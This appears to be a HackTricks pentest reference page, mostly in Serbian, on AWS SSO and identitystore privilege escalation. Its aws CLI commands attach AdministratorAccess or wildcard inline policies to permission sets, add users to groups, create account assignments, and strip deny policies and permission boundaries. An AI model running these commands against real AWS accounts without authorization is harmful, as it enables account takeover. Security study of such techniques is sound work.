AWS - SSO & identitystore Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

AWS Identity Center / AWS SSO

Za više informacija o AWS Identity Center / AWS SSO pogledajte:

AWS - IAM, Identity Center & SSO Enum

Napomena da po default-u, samo korisnici sa dozvolama iz Upravljačkog Naloga mogu pristupiti i kontrolisati IAM Identity Center. Korisnici iz drugih naloga mogu to omogućiti samo ako je nalog Delegirani Administrator. Pogledajte dokumentaciju za više informacija.

Reset Password

Lako rešenje za eskalaciju privilegija u ovakvim slučajevima bi bilo imati dozvolu koja omogućava resetovanje lozinki korisnika. Nažalost, moguće je samo poslati email korisniku da resetuje svoju lozinku, tako da bi vam bio potreban pristup korisnikovom emailu.

`identitystore:CreateGroupMembership`

Sa ovom dozvolom moguće je postaviti korisnika unutar grupe tako da će naslediti sve dozvole koje grupa ima.

aws identitystore create-group-membership --identity-store-id <tore-id> --group-id <group-id> --member-id UserId=<user-id>

`sso:PutInlinePolicyToPermissionSet`, `sso:ProvisionPermissionSet`

Napadač sa ovom dozvolom mogao bi da dodeli dodatne dozvole Permission Set-u koji je dodeljen korisniku pod njegovom kontrolom

# Set an inline policy with admin privileges
aws sso-admin put-inline-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --inline-policy file:///tmp/policy.yaml

# Content of /tmp/policy.yaml
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Statement1",
"Effect": "Allow",
"Action": ["*"],
"Resource": ["*"]
}
]
}

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

`sso:AttachManagedPolicyToPermissionSet`, `sso:ProvisionPermissionSet`

Napadač sa ovom dozvolom može dodeliti dodatne dozvole skupu dozvola koji je dodeljen korisniku pod njegovom kontrolom

# Set AdministratorAccess policy to the permission set
aws sso-admin attach-managed-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess"

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

`sso:AttachCustomerManagedPolicyReferenceToPermissionSet`, `sso:ProvisionPermissionSet`

Napadač sa ovom dozvolom može dodeliti dodatne dozvole skupu dozvola koji je dodeljen korisniku pod njegovom kontrolom.

Da biste zloupotrebili ove dozvole u ovom slučaju, morate znati ime korisničke upravljane politike koja se nalazi u SVE račune koji će biti pogođeni.

# Set AdministratorAccess policy to the permission set
aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference <customer-managed-policy-name>

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

`sso:CreateAccountAssignment`

Napadač sa ovom dozvolom mogao bi dodeliti Permission Set korisniku pod njegovom kontrolom za nalog.

aws sso-admin create-account-assignment --instance-arn <instance-arn> --target-id <account_num> --target-type AWS_ACCOUNT --permission-set-arn <permission_set_arn> --principal-type USER --principal-id <principal_id>

`sso:GetRoleCredentials`

Vraća STS kratkoročne akreditive za dati naziv uloge koji je dodeljen korisniku.

aws sso get-role-credentials --role-name <value> --account-id <value> --access-token <value>

Međutim, potrebna vam je pristupna oznaka koju nisam siguran kako da dobijem (TODO).

`sso:DetachManagedPolicyFromPermissionSet`

Napadač sa ovom dozvolom može ukloniti asocijaciju između AWS upravljane politike i specificiranog skupa dozvola. Moguće je dodeliti više privilegija putem uklanjanja upravljane politike (deny policy).

aws sso-admin detach-managed-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --managed-policy-arn <ManagedPolicyARN>

`sso:DetachCustomerManagedPolicyReferenceFromPermissionSet`

Napadač sa ovom dozvolom može ukloniti asocijaciju između korisničke upravljane politike i određenog skupa dozvola. Moguće je dodeliti više privilegija putem uklanjanja upravljane politike (politika odbijanja).

aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn <value> --permission-set-arn <value> --customer-managed-policy-reference <value>

`sso:DeleteInlinePolicyFromPermissionSet`

Napadač sa ovom dozvolom može ukloniti dozvole iz inline politike iz skupa dozvola. Moguće je dodeliti više privilegija putem odvajanja inline politike (politika odbijanja).

aws sso-admin delete-inline-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>

`sso:DeletePermissionBoundaryFromPermissionSet`

Napadač sa ovom dozvolom može ukloniti Permission Boundary iz skupa dozvola. Moguće je dodeliti više privilegija uklanjanjem ograničenja na Permission Set datom iz Permission Boundary.

aws sso-admin   delete-permissions-boundary-from-permission-set --instance-arn <value> --permission-set-arn <value>

Podržite HackTricks

Proverite planove pretplate!
Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.

PreviousAWS - SQS Privesc NextAWS - Organizations Privesc

Last updated 8 days ago

AWS Identity Center / AWS SSO

Reset Password

identitystore:CreateGroupMembership

sso:PutInlinePolicyToPermissionSet, sso:ProvisionPermissionSet

sso:AttachManagedPolicyToPermissionSet, sso:ProvisionPermissionSet

sso:AttachCustomerManagedPolicyReferenceToPermissionSet, sso:ProvisionPermissionSet

sso:CreateAccountAssignment

sso:GetRoleCredentials

sso:DetachManagedPolicyFromPermissionSet

sso:DetachCustomerManagedPolicyReferenceFromPermissionSet

sso:DeleteInlinePolicyFromPermissionSet

sso:DeletePermissionBoundaryFromPermissionSet

AWS Identity Center / AWS SSO

Reset Password

identitystore:CreateGroupMembership

sso:PutInlinePolicyToPermissionSet, sso:ProvisionPermissionSet

sso:AttachManagedPolicyToPermissionSet, sso:ProvisionPermissionSet

sso:AttachCustomerManagedPolicyReferenceToPermissionSet, sso:ProvisionPermissionSet

sso:CreateAccountAssignment

sso:GetRoleCredentials

sso:DetachManagedPolicyFromPermissionSet

sso:DetachCustomerManagedPolicyReferenceFromPermissionSet

sso:DeleteInlinePolicyFromPermissionSet

sso:DeletePermissionBoundaryFromPermissionSet

`identitystore:CreateGroupMembership`

`sso:PutInlinePolicyToPermissionSet`, `sso:ProvisionPermissionSet`

`sso:AttachManagedPolicyToPermissionSet`, `sso:ProvisionPermissionSet`

`sso:AttachCustomerManagedPolicyReferenceToPermissionSet`, `sso:ProvisionPermissionSet`

`sso:CreateAccountAssignment`

`sso:GetRoleCredentials`

`sso:DetachManagedPolicyFromPermissionSet`

`sso:DetachCustomerManagedPolicyReferenceFromPermissionSet`

`sso:DeleteInlinePolicyFromPermissionSet`

`sso:DeletePermissionBoundaryFromPermissionSet`

`identitystore:CreateGroupMembership`

`sso:PutInlinePolicyToPermissionSet`, `sso:ProvisionPermissionSet`

`sso:AttachManagedPolicyToPermissionSet`, `sso:ProvisionPermissionSet`

`sso:AttachCustomerManagedPolicyReferenceToPermissionSet`, `sso:ProvisionPermissionSet`

`sso:CreateAccountAssignment`

`sso:GetRoleCredentials`

`sso:DetachManagedPolicyFromPermissionSet`

`sso:DetachCustomerManagedPolicyReferenceFromPermissionSet`

`sso:DeleteInlinePolicyFromPermissionSet`

`sso:DeletePermissionBoundaryFromPermissionSet`